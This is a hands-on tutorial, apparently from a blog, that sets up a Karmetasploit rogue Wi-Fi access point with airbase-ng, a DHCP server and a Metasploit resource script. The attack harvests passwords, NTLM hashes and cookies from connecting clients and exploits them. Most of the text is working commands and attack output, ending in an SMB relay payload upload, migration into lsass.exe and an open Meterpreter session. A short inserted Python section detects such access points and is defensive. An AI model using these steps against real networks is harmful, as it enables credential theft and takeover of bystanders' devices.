Karmetasploit is used to create fake access points, capture passwords, harvest information from connecting clients, and launch browser attacks against those clients. Karmetasploit is an add-on tool for Metasploit.
Features of Karmetasploit:
- Capture POP3 and IMAP4 passwords (clear-text and SSL)
- Accept outbound email sent over SMTP
- Parse out FTP and HTTP login information
- Steal cookies from large lists of popular web sites
- Steal saved form fields from the same web sites
- Use SMB relay attacks to load the Meterpreter payload
- Automatically exploit a wide range of browser flaws

Test setup prerequisites:
1. Linux laptop or machine
2. Metasploit framework with Karmetasploit
3. aircrack-ng
4. SQLite3
5. DHCP server
Now let's start with the basics:
1. Install the Metasploit framework with Karmetasploit:
$ svn co http://metasploit.com/svn/framework3/trunk msf3
or download the Metasploit 3.3 release.
If you already have Metasploit installed, download Karmetasploit (the karma.rc resource file) only.
2. Installing aircrack-ng
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
$ make
# make install
3. Start monitor mode:
# airmon-ng start wlan0
Possible output:
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill some of them!

PID   Name
878   avahi-daemon
879   avahi-daemon
1012  NetworkManager
1041  wpa_supplicant

Interface  Chipset          Driver
eth1       Unknown          wl
wlan0      Ralink 2573 USB  rt73usb - [phy0]
                            (monitor mode enabled on mon0)
4. Installing SQLite3
# gem install activerecord sqlite3-ruby
5. Configure the DHCP server
# vi /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

Now let's set up the access point. airmon-ng (from the aircrack-ng suite) created a virtual device in monitor mode, in this case mon0, on which we will bring up the AP. The -P flag tells airbase-ng to respond to probe requests for any SSID, which is what makes clients that remember other networks associate with it.
# airbase-ng -P -C 30 -e "WIFI_POINT2" -v mon0
23:39:19  Created tap interface at0
23:39:19  Trying to set MTU on at0 to 1500
23:39:19  Trying to set MTU on mon0 to 1800
23:39:19  Access Point with BSSID 00:24:01:12:3E:A6 started.
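From the defender's side, the tell-tale sign of an airbase-ng -P style access point is a single BSSID that answers probe requests for many unrelated SSIDs. The following is an added example (not part of the original tutorial) that flags such a BSSID from a list of observed beacon and probe-response frames; the frame records are constructed sample data, with the tutorial's own BSSID standing in for the rogue AP, and the threshold of three SSIDs is an assumption to tune for your environment.

```python
# Added example: detect a KARMA-style rogue AP (one BSSID answering probes for
# many different SSIDs, as "airbase-ng -P" does) from monitor-mode frame records.
# SAMPLE_FRAMES is constructed sample data; a real deployment would feed these
# records from a capture (e.g. airodump-ng or a pcap parser).
from collections import defaultdict

# Each record is (frame_type, bssid, ssid). Constructed sample data: the first
# BSSID is the tutorial's rogue AP, the other two are well-behaved APs.
SAMPLE_FRAMES = [
    ("beacon",     "00:24:01:12:3E:A6", "WIFI_POINT2"),
    ("probe_resp", "00:24:01:12:3E:A6", "HomeWifi"),
    ("probe_resp", "00:24:01:12:3E:A6", "CoffeeShop"),
    ("probe_resp", "00:24:01:12:3E:A6", "corp-guest"),
    ("probe_resp", "00:24:01:12:3E:A6", "linksys"),
    ("beacon",     "aa:bb:cc:dd:ee:01", "HomeWifi"),
    ("probe_resp", "aa:bb:cc:dd:ee:01", "HomeWifi"),
    ("beacon",     "aa:bb:cc:dd:ee:02", "corp-guest"),
    ("probe_resp", "aa:bb:cc:dd:ee:02", "corp-guest"),
]


def ssids_per_bssid(frames):
    """Map each BSSID (normalised to lower case) to the set of SSIDs it has
    advertised in beacons or answered for in probe responses."""
    seen = defaultdict(set)
    for frame_type, bssid, ssid in frames:
        if frame_type in ("beacon", "probe_resp") and ssid:
            seen[bssid.lower()].add(ssid)
    return seen


def find_karma_aps(frames, threshold=3):
    """Return {bssid: sorted list of SSIDs} for every BSSID that answered for at
    least `threshold` distinct SSIDs. A legitimate AP serves one or a handful of
    SSIDs; one that answers for every name a client probes behaves like
    airbase-ng -P. The threshold is an assumed, environment-specific value."""
    return {bssid: sorted(ssids)
            for bssid, ssids in ssids_per_bssid(frames).items()
            if len(ssids) >= threshold}


if __name__ == "__main__":
    for bssid, ssids in find_karma_aps(SAMPLE_FRAMES).items():
        print(f"suspicious BSSID {bssid} answered for {len(ssids)} SSIDs: {ssids}")
```

A client-side counterpart to this check is to disable automatic reconnection to remembered open networks, since that probing behaviour is exactly what the -P option exploits.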
Now assign an IP address to at0 and start the DHCP server. Do this in a second shell, leaving airbase-ng running in the first.
# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
(The PID file error is a known issue and can be ignored; the server still works.)
Now let's use Karmetasploit!
# msfconsole -r karma.rc
[*] Started reverse handler on port 3333
[*] Starting the payload handler...
[*] Started reverse handler on port 6666
[*] --- Done, found 14 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://77.209.92.221:55550/ads
[*] Server started.
msf auxiliary(http) >
Note: if you downloaded karma.rc manually, run
# msfconsole -r /tmp/karma.rc
(where /tmp is the directory containing karma.rc).
Sample output:
[*] Received 10.0.0.100:1362 TARGETP0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGETP0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.sample.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.example.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.someforum.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.socialenggsite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.mailsite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > mailsite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.someinfogather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGETP0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGETP0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGETP0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGETP0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)

msf auxiliary(http) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.0.0.1:45017 -> 10.0.0.100:1364
Mission accomplished! Our work is done!